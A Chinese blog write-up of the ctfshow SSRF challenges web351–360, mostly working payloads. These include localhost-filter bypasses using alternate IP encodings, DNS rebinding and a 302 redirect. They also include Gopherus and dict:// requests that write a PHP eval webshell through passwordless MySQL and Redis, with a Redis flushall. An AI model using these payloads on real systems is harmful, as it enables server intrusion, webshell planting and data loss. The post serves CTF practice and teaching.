ctfshow SSRF

已于 2022-02-28 20:14:57 修改
阅读量992 收藏
点赞数 2
分类专栏: SSRF ctfshow 文章标签: php
于 2022-02-28 17:06:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61237064/article/details/123184432
版权

web 351

直接读取本地文件

url=file:///var/www/html/flag.php

url=127.0.0.1/flag.php

web352

这里要求是http或者https协议,只需要满足这个就可以了。

url=http://localhost/flag.php

url=http://127.0.0.1/flag.php

url=http://127.1/flag.php

url=http://0.0.0.0/flag.php

url=http:/0/flag.php

url=http://127.127.127.127/flag.php

url=http://127。0。0。1/flag.php

url=http://0x7F.0.0.1/flag.php

url=http://0177.0.0.1/flag.php

url=http://2130706433/flag.php

url=http://0x7F000001/flag.php

web353

url=http://127.1/flag.php

url=http://0177.0.0.1/flag.php

url=http://0x7F000001/flag.php

url=http://0x7F.0.0.1/flag.php

url=http://2130706433/flag.php

url=http://0.0.0.0/flag.php

借助352的一大堆可以打。

web354

http://sudo.cc这个是解析到127.0.0.1的域名,直接用即可。

url=http://sudo.cc/flag.php

web355

PHP: parse_url - Manual

因为$host<5,所以构造个小于5的payload就可以了。

url=http://127.1/flag.php

url=http://0/flag.php

web356

$host小于3

url=http://0/flag.php

web357

PHP FILTER_VALIDATE_IP 过滤器 | 菜鸟教程

这题过滤了,不能访问内网的IP,有两个方法来完成这题。

一、302跳转 

在服务器上新建一个302.php,内容如下:

<?php 

header("Location:http://127.0.0.1/flag.php");

二、Dns重绑定 

CEYE - Monitor service for security testing

在上面这个平台注册后,它会给你一个域名,把dns重绑定的东西改成下面。第一个写公网的IP,第二个写127.0.0.1。

大致的原理是:

输入payload,在waf检查的时候,本地Dns服务器向Dns服务器发起请求,解析域名,刚好重绑定到公网的1.1.1.23。

然后在file_get_contents($url);读取文件时,TLE时间快速失效,Dns服务器缓存清空,得重新对域名进行解析,这时恰好重绑定到127.0.0.1这个ip,顺利读到内网的文件。

因为这个dns重绑定解析到哪个ip是随机的,有可能第一个是127.0.0.1,第二个也是127.0.0.1,这个得看运气。也有可能在过waf的时候就解析到1.1.1.23,读取文件的时候解析到127.0.0.1,直接一次成功。

所以得多试几次

具体的可以看一下大佬的文章。 

 浅谈DNS重绑定漏洞 - 知乎

web358

.*是正则表达的贪婪法制,匹配尽可能多的字符。

url=http://ctf.@127.0.0.1/flag.php?show

url=http://ctf.@127.0.0.1/flag.php#show

为什么访问的是@后面的127.0.0.1,这与parse_url的解析有关。

PHP: parse_url - Manual

web359

题目提示打无密码的mysql,这里感觉也算是盲打了,第一是不知道secure_file_priv的值,也就是说允不允许导入导出;第二是不知道当前网站路径有没有写入权限;

因为是无密码的mysql,有三种利用方式。

一是可以构造原生数据包通过gopher查数据库的数据

二是写webshell

三是UDF提权

先一个个来试吧,因为第一和第三种有点麻烦,先试一下最简单的第二种。

打开gopher小工具https://github.com/tarunkant/Gopherus

使用方式:

python2 gopherus.py --exploit mysql

Give MySQL username: root                                   

Give query to execute: select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"

将得的结果在_后面再url全编码一次。

访问url/1.php,然后在post处命令执行。

web360

和上题差不多的方法,用gopher打redis。

可能是写webshell、反弹shell、写公钥,也是得一个个试。

这题的话是写webshell,直接利用小工具

What do you want?? (ReverseShell/PHPShell): phpshell

Give web root location of server (default is /var/www/html): Give PHP Payload (We have default PHP Shell): <?php eval($_POST[1]);?>

URL编码一下_后面的内容,生成的webshell默认是shell.php中

发的包会超时,但是没事,shell.php还是生成了。

刚想起另外一个骚姿势,其实也和用gopher生成的差不多,原理都是差不多,只不过这个用的是dict协议。

# 清空 key
flushall

# 设置要操作的路径为网站根目录
config set dir /var/www/html

# 在网站目录下创建 shell.php 文件
config set dbfilename shell.php

# 设置 shell.php 的内容
set x "\n<?php eval($_GET[1]);?>\n"

# 保存上述操作
save
 

dict://127.0.0.1:6379/flushall

dict://127.0.0.1:6379/config set dir  /var/www/html

dict://127.0.0.1:6379/config set dbfilename shell.php 

dict://127.0.0.1:6379/set x  "\n<?php eval($_GET[1]);?>\n"

dict://127.0.0.1:6379/save

在第四步写一句话的时候得换成代码的十六进制,直接写的话,可能是得转义或者过滤的原因,问号过不了,会显示命令执行失败,先把一句话在bp转成ascll的十六进制。

在写入的时候每两位插入一个\x,以表示代码的十六进制。

最后在shell.php执行system('cat /f*');就行了。 

ZredamanJ
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-SSRF
qq_45655564的博客
07-01 441
web351-普通的ssrf本地访问 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?&
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
ctfshow——SSRF
最新发布
qq_55202378的博客
05-02 933
(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
Bugku CTF web12(Web)
ChaoYue_miku的博客
02-23 1070
0、打开网页,发现需要输入用户名和密码 用户名使用admin 密码可以爆破得到,也可以查看注释 将dGVzdDEyMw==进行base64解码得到密码:test123 1、输入用户名和密码 无法登录,提示只有本地管理员可以访问,由此考虑到使用xff方法修改IP为本地地址 2、使用BurpSuite抓包 3、添加:X-Forwarded-For: 127.0.0.1后发送 4、得到flag:flag{9876894a5ec96ef77b6d54ba5cd983bf.
CTFHub技能树 Web-SSRF 内网访问
Senimo
07-01 413
CTFHub技能树 Web-SSRF 内网访问 hint:尝试访问位于127.0.0.1的flag.php吧 启动环境,访问页面为空白,查看URL: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=_ 其中存在 GET 方式的传参:url=_,将127.0.0.1/flag.php地址填入尝试访问: http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=
CTF-WEB-01-localhost access only!!
weixin_30402085的博客
07-30 2953
题目地址:http://http://web.jarvisoj.com:32774/ 0x01 题目分析   localhost access only字面意思只允许本机登录   考虑添加header:             X-Forward-For 127.0.0.1     ...
CTFHub web技能树 SSRF
qq_61768489的博客
02-23 1111
主要的几个协议 file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容 http/s协议:探测内网主机存活 dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等 gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 内网访问 /?url=127.0.0.1/flag.php 伪协议.
CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 911
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
一次失败的CTF尝试记录(SSRF利用)
痴人说梦梦中人
10-13 973
访问url,获取index.php代码如下: <?php if(!(isset($_POST['url']))){ show_source(__FILE__); } // include_once "ping.php"; if (isset($_POST['url'])) { $link = $_POST['url']; if(check($link)){ $curlobj = curl_init(); curl_setopt($curlobj
ctfhub--web--SSRF(1.内网访问2.伪协议读取文件 3.端口扫描 4.POST请求 5.文件上传 8.URL Bypass 9.数字IP Bypass) )
feiniaotjx的博客
10-10 538
ctfhub--web--SSRF1.内网访问2.伪协议读取文件3.端口扫描4.POST请求 1.内网访问 传参给url,访问一个地址文件 2.伪协议读取文件 读取网站文件 3.端口扫描 通过返回的内容判断端口是否存在 import requests try: for i in range(8000,9001): url='http://challenge-43493ad3b38edf3f.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+
Jarvis-OJ-Web writeup
a370793934的专栏
11-28 1070
PORT51 访问了页面发现让你 Please use port 51 to visit this site. 明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–local-port命令 --local-port <端口号>[-num]设置连接使用的首选端口号或本地端口范围。请注意,端口号是一种稀缺资源,繁忙...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包 可以看到avatar的一个参数,采用的是请求其他地方的图片,此时我们对这条URL进行修改 凭借dnslog并用#注释掉后面的URL地址 发现这边收到了请求 此时查看...
漏洞系列一一看我一招征服漏洞SSRF
Android_wxf的博客
07-08 763
SSRF简介 SSRF(Server-Side Request Forgery:服务器端请求伪造是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 如图是一个简单的SSRF 源码如下 <?php
CTFSSRF常见绕过
qq_42383069的博客
04-24 1470
ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan。当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过。进制转换:https://www.sojson.com/hexconvert.html。
ssrf漏洞 CTF
zb0567的专栏
04-21 1785
扫描 /index.php /robots.txt User-agent: * Disallow: /webshe11231231231.php http://*:8016/index.php?url=www.baidu.com http://*:8016/index.php?url=file:///etc/passwd 读取文件 http://*:8016/index.php?u...
ctfshow ssrf
08-16
- *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值